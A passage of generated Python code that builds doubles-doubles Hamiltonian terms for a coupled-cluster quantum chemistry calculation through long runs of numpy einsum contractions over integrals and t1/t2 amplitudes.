# -1.0000 d(f,a)*d(n,i)*<j,e||c,b>*t1(c,m)
Hdd += -1.000000000000000 * einsum('fa,ni,jecb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*<i,e||c,b>*t1(c,m)
Hdd += 1.000000000000000 * einsum('fa,nj,iecb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(e,f)d(n,j)*d(m,i)*<k,e||a,b>*t1(f,k)
contracted_intermediate = 1.000000000000000 * einsum('nj,mi,keab,fk->efmnabij', kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->femnabij', contracted_intermediate)
# -1.0000 P(e,f)d(m,j)*d(n,i)*<k,e||a,b>*t1(f,k)
contracted_intermediate = -1.000000000000000 * einsum('mj,ni,keab,fk->efmnabij', kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->femnabij', contracted_intermediate)
# -1.0000 d(e,b)*d(n,j)*d(m,i)*<k,f||c,a>*t1(c,k)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,kfca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*<k,f||c,a>*t1(c,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,kfca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*<k,f||c,b>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,kfcb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*<k,f||c,b>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,kfcb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,i)*<j,f||c,a>*t1(c,n)
Hdd += 1.000000000000000 * einsum('eb,mi,jfca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,f||c,a>*t1(c,n)
Hdd += -1.000000000000000 * einsum('eb,mj,ifca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,f||c,b>*t1(c,n)
Hdd += -1.000000000000000 * einsum('ea,mi,jfcb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*<i,f||c,b>*t1(c,n)
Hdd += 1.000000000000000 * einsum('ea,mj,ifcb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,i)*<j,f||c,a>*t1(c,m)
Hdd += -1.000000000000000 * einsum('eb,ni,jfca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*<i,f||c,a>*t1(c,m)
Hdd += 1.000000000000000 * einsum('eb,nj,ifca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*<j,f||c,b>*t1(c,m)
Hdd += 1.000000000000000 * einsum('ea,ni,jfcb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*<i,f||c,b>*t1(c,m)
Hdd += -1.000000000000000 * einsum('ea,nj,ifcb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.2500 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += 0.250000000000000 * einsum('ea,fb,nj,mi,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.2500 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += -0.250000000000000 * einsum('ea,fb,mj,ni,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.2500 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += -0.250000000000000 * einsum('fa,eb,nj,mi,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# 0.2500 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += 0.250000000000000 * einsum('fa,eb,mj,ni,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,d>*t2(c,d,n,k)
Hdd += -0.500000000000000 * einsum('ea,fb,mi,jkcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,d>*t2(c,d,n,k)
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ikcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,d>*t2(c,d,n,k)
Hdd += 0.500000000000000 * einsum('fa,eb,mi,jkcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,d>*t2(c,d,n,k)
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ikcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,d>*t2(c,d,m,k)
Hdd += 0.500000000000000 * einsum('ea,fb,ni,jkcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,d>*t2(c,d,m,k)
Hdd += -0.500000000000000 * einsum('ea,fb,nj,ikcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,d>*t2(c,d,m,k)
Hdd += -0.500000000000000 * einsum('fa,eb,ni,jkcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,d>*t2(c,d,m,k)
Hdd += 0.500000000000000 * einsum('fa,eb,nj,ikcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*<i,j||c,d>*t2(c,d,m,n)
Hdd += 0.500000000000000 * einsum('ea,fb,ijcd,cdmn->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*<i,j||c,d>*t2(c,d,m,n)
Hdd += -0.500000000000000 * einsum('fa,eb,ijcd,cdmn->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,b)*d(n,j)*d(m,i)*<l,k||c,a>*t2(c,e,l,k)
Hdd += -0.500000000000000 * einsum('fb,nj,mi,lkca,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,b)*d(m,j)*d(n,i)*<l,k||c,a>*t2(c,e,l,k)
Hdd += 0.500000000000000 * einsum('fb,mj,ni,lkca,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(n,j)*d(m,i)*<l,k||c,b>*t2(c,e,l,k)
Hdd += 0.500000000000000 * einsum('fa,nj,mi,lkcb,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,j)*d(n,i)*<l,k||c,b>*t2(c,e,l,k)
Hdd += -0.500000000000000 * einsum('fa,mj,ni,lkcb,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,i)*<j,k||c,a>*t2(c,e,n,k)
Hdd += 1.000000000000000 * einsum('fb,mi,jkca,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*<i,k||c,a>*t2(c,e,n,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ikca,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,k||c,b>*t2(c,e,n,k)
Hdd += -1.000000000000000 * einsum('fa,mi,jkcb,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*<i,k||c,b>*t2(c,e,n,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ikcb,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,i)*<j,k||c,a>*t2(c,e,m,k)
Hdd += -1.000000000000000 * einsum('fb,ni,jkca,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*<i,k||c,a>*t2(c,e,m,k)
Hdd += 1.000000000000000 * einsum('fb,nj,ikca,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,k||c,b>*t2(c,e,m,k)
Hdd += 1.000000000000000 * einsum('fa,ni,jkcb,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*<i,k||c,b>*t2(c,e,m,k)
Hdd += -1.000000000000000 * einsum('fa,nj,ikcb,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*<i,j||c,a>*t2(c,e,m,n)
Hdd += -1.000000000000000 * einsum('fb,ijca,cemn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(f,a)*<i,j||c,b>*t2(c,e,m,n)
Hdd += 1.000000000000000 * einsum('fa,ijcb,cemn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(e,b)*d(n,j)*d(m,i)*<l,k||c,a>*t2(c,f,l,k)
Hdd += 0.500000000000000 * einsum('eb,nj,mi,lkca,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,b)*d(m,j)*d(n,i)*<l,k||c,a>*t2(c,f,l,k)
Hdd += -0.500000000000000 * einsum('eb,mj,ni,lkca,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,j)*d(m,i)*<l,k||c,b>*t2(c,f,l,k)
Hdd += -0.500000000000000 * einsum('ea,nj,mi,lkcb,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(m,j)*d(n,i)*<l,k||c,b>*t2(c,f,l,k)
Hdd += 0.500000000000000 * einsum('ea,mj,ni,lkcb,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t2(c,f,n,k)
Hdd += -1.000000000000000 * einsum('eb,mi,jkca,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t2(c,f,n,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ikca,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t2(c,f,n,k)
Hdd += 1.000000000000000 * einsum('ea,mi,jkcb,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t2(c,f,n,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ikcb,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,i)*<j,k||c,a>*t2(c,f,m,k)
Hdd += 1.000000000000000 * einsum('eb,ni,jkca,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*<i,k||c,a>*t2(c,f,m,k)
Hdd += -1.000000000000000 * einsum('eb,nj,ikca,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,k||c,b>*t2(c,f,m,k)
Hdd += -1.000000000000000 * einsum('ea,ni,jkcb,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*<i,k||c,b>*t2(c,f,m,k)
Hdd += 1.000000000000000 * einsum('ea,nj,ikcb,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*<i,j||c,a>*t2(c,f,m,n)
Hdd += 1.000000000000000 * einsum('eb,ijca,cfmn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||c,b>*t2(c,f,m,n)
Hdd += -1.000000000000000 * einsum('ea,ijcb,cfmn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(n,j)*d(m,i)*<l,k||a,b>*t2(e,f,l,k)
Hdd += 0.500000000000000 * einsum('nj,mi,lkab,eflk->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(m,j)*d(n,i)*<l,k||a,b>*t2(e,f,l,k)
Hdd += -0.500000000000000 * einsum('mj,ni,lkab,eflk->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(m,i)*<j,k||a,b>*t2(e,f,n,k)
Hdd += -1.000000000000000 * einsum('mi,jkab,efnk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,j)*<i,k||a,b>*t2(e,f,n,k)
Hdd += 1.000000000000000 * einsum('mj,ikab,efnk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(n,i)*<j,k||a,b>*t2(e,f,m,k)
Hdd += 1.000000000000000 * einsum('ni,jkab,efmk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(n,j)*<i,k||a,b>*t2(e,f,m,k)
Hdd += -1.000000000000000 * einsum('nj,ikab,efmk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += -0.500000000000000 * einsum('ea,fb,nj,mi,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ni,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += 0.500000000000000 * einsum('fa,eb,nj,mi,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||c,d>*t1(c,k)*t1(d,l)
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ni,lkcd,ck,dl->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (2, 3), (2, 4), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,d>*t1(c,k)*t1(d,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mi,jkcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,d>*t1(c,k)*t1(d,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ikcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,d>*t1(c,k)*t1(d,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mi,jkcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,d>*t1(c,k)*t1(d,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ikcd,ck,dn->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,d>*t1(c,k)*t1(d,m)
Hdd += -1.000000000000000 * einsum('ea,fb,ni,jkcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,d>*t1(c,k)*t1(d,m)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,ikcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,d>*t1(c,k)*t1(d,m)
Hdd += 1.000000000000000 * einsum('fa,eb,ni,jkcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,d>*t1(c,k)*t1(d,m)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,ikcd,ck,dm->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*<l,k||c,a>*t1(c,k)*t1(e,l)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,lkca,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*<l,k||c,a>*t1(c,k)*t1(e,l)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,lkca,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*<l,k||c,b>*t1(c,k)*t1(e,l)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,lkcb,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*<l,k||c,b>*t1(c,k)*t1(e,l)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,lkcb,ck,el->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*d(m,i)*<l,k||c,a>*t1(c,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,lkca,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*<l,k||c,a>*t1(c,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,lkca,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*<l,k||c,b>*t1(c,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,lkcb,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*<l,k||c,b>*t1(c,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,lkcb,ck,fl->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (1, 2), (1, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*<i,j||c,d>*t1(c,n)*t1(d,m)
Hdd += -1.000000000000000 * einsum('ea,fb,ijcd,cn,dm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*<i,j||c,d>*t1(c,n)*t1(d,m)
Hdd += 1.000000000000000 * einsum('fa,eb,ijcd,cn,dm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,i)*<j,k||c,a>*t1(c,n)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mi,jkca,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*<i,k||c,a>*t1(c,n)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ikca,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,k||c,b>*t1(c,n)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mi,jkcb,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*<i,k||c,b>*t1(c,n)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ikcb,cn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t1(c,n)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mi,jkca,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t1(c,n)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ikca,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t1(c,n)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mi,jkcb,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t1(c,n)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ikcb,cn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(n,i)*<j,k||c,a>*t1(c,m)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,ni,jkca,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*<i,k||c,a>*t1(c,m)*t1(e,k)
